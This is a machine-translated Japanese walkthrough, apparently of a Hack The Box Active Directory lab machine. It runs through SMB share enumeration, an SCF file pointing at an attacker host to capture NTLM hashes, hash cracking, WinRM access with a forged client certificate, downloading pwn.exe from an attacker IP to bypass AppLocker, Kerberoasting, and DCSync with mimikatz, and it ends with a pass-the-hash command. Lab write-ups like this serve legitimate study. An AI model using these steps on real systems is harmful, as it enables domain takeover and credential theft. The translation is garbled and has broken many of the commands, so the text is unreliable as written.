ノートには、前に持ち越さ
---
図1は、エアリンクの確立は、smbclientので共有ビューに、443を開い
smbclientの-N -L \\\\ 1.1.1.1
部門の株式
操作シェア
CertEnroll
3株は、デフォルトの共有ドメイン証明書サービスであります
図2は、ローカルにマウント共有しました
RW -o -t CIFSマウント、ユーザー名=ゲスト、パスワード= '//10.10.10.103/Department株式' / mntに
CDを/ mnt
3ビュー共有ディレクトリの書き込み可能なディレクトリ
#!/ binに/ bashの
リスト= $(見つけるの/ mnt -type D)
$リストでdに関する
行う
タッチ$ D / X 2>を/ dev / null
もし[$ - ?EQ0]
それから
エコー$ dは、「書き込み可能です」
されます
完了
ハッシュを取得する書き込み可能なディレクトリのファイルに入れて4 SCF、オープン応答モニタ
[シェル]
コマンド= 2
IconFile = \\ 10.10.14.3 \共有\のpwn.ico
[タスクバー]
コマンド= ToggleDesktop
CP pwn.scfを/ mnt /ユーザ/公開
CP pwn.scfを/ mnt / ZZ_ARCHIVE
レスポンダ-I tun0
5パスワードを取得し、ハッシュをクラック
ジョン・ハッシュ-w = /パス/に/ rockyou.txt
図6は、スクリプトを使用してPSRemotingを使用しようと、5985を開設しました
https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb
失敗は、その使用証明書の認証サーバを見つけました
7証明書を作成します。
パスワードは、着陸ポート443 AD CS / certsrvなどの目の前で見ることができます
二回一貫性のあるパスフレーズの作成時に指定
証明書署名要求CSRを作成します
opensslのgenrsa -out -des3 amanda.key 2048#作成した秘密鍵
openssl reqが-new -key amanda.key -out amanda.csr#CSRを作成します
8 winrm_shell.rbスクリプトを変更
CONN = WinRMの:: Connection.new(
エンドポイント:「https://10.10.10.103:5986/wsman」
交通::SSL、
:CLIENT_CERT => 'certnew.cerを'、サーバーから#
:client_key => 'amanda.key'、#秘密鍵
:no_ssl_peer_verification =>真
)
rlwrapルビーwinrm_shell.rb
9契約製CC
AppLockerの実行ランチャーをバイパスする10のダウンロードと使用色
wgetのhttp://10.10.16.3/pwn.exe -O pwn.exe
CPのpwn.exeのC:\ WINDOWS \ System32に\スプール\ドライバ\色
C:\ WINDOWS \ System32に\スプール\ドライバ\カラーの\ pwn.exe
11取得SPN
シェルSETSPN.EXE -t HTB -q * / *
12 kerberoast
以前に生成されたトークンパスワードを使用して、まず
MakeTokenユーザーdomianパス
kerberoast spn_user
hashcatブレーク
hashcat -m 13100 -a 0 spn_user rockyou.txt
同じように、バックシェルで新しいユーザーをプレイ13
14 PowerViewには、ACL構成エラーを検出する使用
1つのwgetのhttps://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
2 PowerShellImport PowerView.ps1
PowerShellには、Get-ObjectACL "DC = HTB、DC = local" を-ResolveGUIDs | ?{($ _。ActiveDirectoryRights -match 'GenericAll') - または($ _。ObjectAceType -match 'レプリケーション-ゲット')}
私たちは、オブジェクトが権限DS-レプリケーション・ゲット・変更・すべての権限を持っていることがわかりました
新たに取得し、そのユーザーに属しています
15ユーザーDS-レプリケーション・ゲット・変更-すべての権限この権限ができ、直接dcsyncがあります。
DCSync管理者htb.localのシズル
またはmimikatzを使用
mimikatz lsadump :: dcsync /ユーザー:管理者/domain:htb.local / DC:ジュージューという音
16またはPSEXEC wmiexec PTHと
wmiexec.py [email protected] -hashes
336d863559a3f7e69371a85ad959a675:f6b7160bfc91823792e0ac3a162c9267